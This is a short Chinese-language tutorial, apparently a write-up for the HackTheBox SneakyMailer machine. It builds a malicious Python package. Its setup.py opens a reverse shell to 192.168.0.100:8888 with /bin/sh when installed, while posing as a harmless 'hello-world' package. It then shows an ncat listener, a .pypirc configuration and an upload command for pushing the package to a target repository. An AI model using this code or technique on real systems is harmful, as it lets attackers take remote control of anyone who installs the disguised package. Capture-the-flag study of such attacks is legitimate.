Evil Python Package Demo

Evil Python Package Demo


文件结构

1
2
3
pypi_evil
├── __init__.py
└── setup.py

创建恶意 setup.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import setuptools
import socket, subprocess, os

# Reverse Shell
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.100",  8888))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p=subprocess.call(["/bin/sh", "-i"]);

# 伪装 信息
setuptools.setup(
    name="hello-world",
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
)

测试是否运行正常

1
2
3
4
5
$ ncat -lvnp 8888

####

$ python3 setup.py

创建 .pypirc

创建 .pypirc 用以将包分发到远程服务器(目标)

1
2
3
4
5
6
7
[distutils]
index-servers = remote

[remote]
repository = <second-repository URL>
username = <second-repository username>
password = <second-repository password>

分发到远程服务器

1
$ python3 setup.py sdist upload -r remote

  • YoutuBe - Ippsec - HackTheBox - SneakyMailer